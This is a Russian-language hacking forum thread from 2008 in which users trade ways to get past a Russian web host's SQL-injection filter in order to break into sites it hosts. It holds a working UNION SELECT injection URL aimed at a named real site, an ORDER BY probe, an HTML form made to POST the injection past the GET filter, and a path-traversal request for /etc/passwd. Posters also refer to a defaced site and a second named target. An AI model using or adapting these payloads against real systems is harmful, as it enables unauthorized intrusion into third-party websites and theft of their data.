Чёртов spaceweb

Discussion in 'Болталка' started by Ponchik, 13 Feb 2008.

  1. Ponchik

    Ponchik Хлебо-булочное изделие

    Joined:
    30 Aug 2005
    Messages:
    687
    Likes Received:
    807
    Reputations:
    311
    Не нащёл куда нажаловаться такчто пишу сюда :D

    В общем сайты которые висят на этом хостинге никак неполучается сломать, чуть что-то нетак в SQL запросе и кадает на http://2.sweb.ru/insecure :mad: Я ваще думал что обойти никак низя, но нащёл сайт с SQL inj висящий на этом хостинге и задефейсеный :confused: МБ другая дыра там была, но я склоняюсь к скуле... В общем вот дырко
    Code:
    http://www.flotov.net/log.php?id=1'+UNION+SELECT+1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,VERSION()/*
    если прописать from+table/* ... ну сами в общем пасмарите... Вопрос по хостингу, как обойти эту сраную фильтрацию, или как это назвать :(
    Возможно-ли это ваще...
     
  2. it's my

    it's my Banned

    Joined:
    29 Sep 2007
    Messages:
    335
    Likes Received:
    347
    Reputations:
    36
    Анти-Фильтрация или Обход фильтрации запрещенных слов в MySQL:
    /thread56409-sweb.html
     
  3. Ponchik

    Ponchik Хлебо-булочное изделие

    Joined:
    30 Aug 2005
    Messages:
    687
    Likes Received:
    807
    Reputations:
    311
    Ёлки, sweb... Я всё рыл на spaceweb =\
    Спасибо
     
    #3 Ponchik, 13 Feb 2008
    Last edited: 13 Feb 2008
  4. Scipio

    Scipio Well-Known Member

    Joined:
    2 Nov 2006
    Messages:
    733
    Likes Received:
    544
    Reputations:
    190
    это не там где только гет фильтруеЦЦо

    it's my, гы твой пост не посмотрел...
     
    #4 Scipio, 13 Feb 2008
    Last edited: 13 Feb 2008
  5. Ponchik

    Ponchik Хлебо-булочное изделие

    Joined:
    30 Aug 2005
    Messages:
    687
    Likes Received:
    807
    Reputations:
    311
    Эх! Прочитал я тему и был уверен что всё получится... А нет...
    Навоял такую форму
    Code:
    <form method="post" action="http://www.flotov.net/log.php">
    <input name="id" type="text" size="200"><br>
    <input type="submit">
    </form>
    Взял существующий ID http://www.flotov.net/log.php?id=bdc26a63b13ccabfd478f160e46da358 и вбил
    Code:
    bdc26a63b13ccabfd478f160e46da358
    в поле, норм, сработало, тогда вбил
    Code:
    bdc26a63b13ccabfd478f160e46da358'+ORDER+BY+1/*
    не сработало, а так работает
    Code:
    http://www.flotov.net/log.php?id=bdc26a63b13ccabfd478f160e46da358'+ORDER+BY+1/*
    Пробовал пару разных вариантов, 0 :(

    [Update]
    Щас подумал, мб вы имеете в виду
    Code:
    <form method="post" action="http://www.flotov.net/log.php?id=1'+UNION+SELECT+1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,VERSION()+FROM+Users/*">
    Но нет, редирект :mad:
    P.S. Я звеняюсь, но я сваливаю спать, буду вечером :eek:
     
    #5 Ponchik, 13 Feb 2008
    Last edited: 13 Feb 2008
  6. Spyder

    Spyder Elder - Старейшина

    Joined:
    9 Oct 2006
    Messages:
    1,388
    Likes Received:
    1,209
    Reputations:
    475
    http://mebel.org.ua/cgi-bin/post.php

    Всё нормально работает, только вот таблицы не подобрал
     
  7. Spyder

    Spyder Elder - Старейшина

    Joined:
    9 Oct 2006
    Messages:
    1,388
    Likes Received:
    1,209
    Reputations:
    475
    http://www.flotov.net/log.php?id=/etc/passwd

    :D
     
  8. Ponchik

    Ponchik Хлебо-булочное изделие

    Joined:
    30 Aug 2005
    Messages:
    687
    Likes Received:
    807
    Reputations:
    311
    Пилять, и в чём была моя ошибка, почему у меня не получалось? :mad:
     
    #8 Ponchik, 13 Feb 2008
    Last edited: 13 Feb 2008